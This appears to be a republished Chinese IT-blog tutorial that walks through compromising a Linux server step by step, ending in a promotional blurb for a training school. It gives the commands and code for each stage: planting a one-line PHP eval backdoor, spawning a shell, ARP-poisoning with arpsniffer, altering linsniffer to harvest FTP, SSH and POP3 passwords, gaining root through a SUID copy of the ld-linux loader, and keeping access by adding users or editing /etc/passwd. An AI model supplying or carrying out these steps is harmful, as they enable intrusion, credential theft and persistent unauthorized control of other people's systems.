Deploy a One‑Line PHP Backdoor and Escalate Linux Privileges
This guide shows how to plant a PHP backdoor, obtain an interactive shell, enumerate system information, compile and use network sniffers, modify source to capture credentials, and exploit Linux kernel and configuration weaknesses to achieve root access.
First, create a one‑line PHP backdoor on the target server:
echo -e "<?php @eval($_POST[md5])?>" > rankuplog_time.php
Verify the file:
cat rankuplog_time.php
Use a Python one‑liner to spawn an interactive shell if Python is installed:
python -c 'import pty; pty.spawn("/bin/sh")'
Check the current user ID and kernel version:
id
uname -r
Linux privilege escalation can be categorized into third‑party software vulnerabilities, local trust features, and kernel overflows. Search for appropriate exploits at sites such as http://tools.90sec.org/, http://sebug.net/paper/linux_exp/, http://x73.cc/bitch/exp/, and http://www.exploit-db.com/search/.
Compile and run a network sniffer (arpsniffer) after installing required libraries:
rpm -ivh libnet-1.1.2.1-2.1.fc2.rf.i386.rpm
wget http://downloads.sourceforge.net/libpcap/libpcap-0.8.1.tar.gz
tar zxvf libpcap-0.8.1.tar.gz && cd libpcap-0.8.1 && ./configure && make && make install
gcc -I/usr/local/include -L/usr/local/lib -o arpsniffer arpsniffer.c -lpcap -lnet
Run the sniffer to perform ARP poisoning and capture traffic:
./arpsniffer -I eth0 -M 192.168.0.77 -W 192.168.0.1 -S 192.168.0.11 -P 110
Capture the target’s packets with tcpdump and save them for analysis:
tcpdump -i eth0 host 192.168.0.11 -w pop.txt
Modify linsniffer.c to listen for specific service ports (e.g., FTP, SSH, Telnet, HTTP, POP3) and compile:
if(ntohs(tcp->dest)==21) p=1; /* ftp */
if(ntohs(tcp->dest)==22) p=1; /* ssh */
gcc -o linsniffer linsniffer.c
Run the compiled sniffer; captured usernames and passwords are stored in tcp.log:
./linsniffer
For systems where privilege escalation via the kernel is possible, use a local root exploit (e.g., udp_sendmsg for kernels ≤ 2.6.19) and set the SUID bit on a copied loader:
cp /lib/ld-linux.so.2 /tmp/.str1ven
chmod +s /tmp/.str1ven
Execute the loader to obtain a root shell:
./.str1ven $(which whoami)
After gaining root, you can add a privileged user, edit /etc/passwd, or modify service configurations (e.g., enable SSH password authentication) to maintain access.
MaGe Linux Operations
Founded in 2009, MaGe Education is a top Chinese high‑end IT training brand. Its graduates earn 12K+ RMB salaries, and the school has trained tens of thousands of students. It offers high‑pay courses in Linux cloud operations, Python full‑stack, automation, data analysis, AI, and Go high‑concurrency architecture. Thanks to quality courses and a solid reputation, it has talent partnerships with numerous internet firms.
How this landed with the community
Was this worth your time?
0 Comments
Thoughtful readers leave field notes, pushback, and hard-won operational detail here.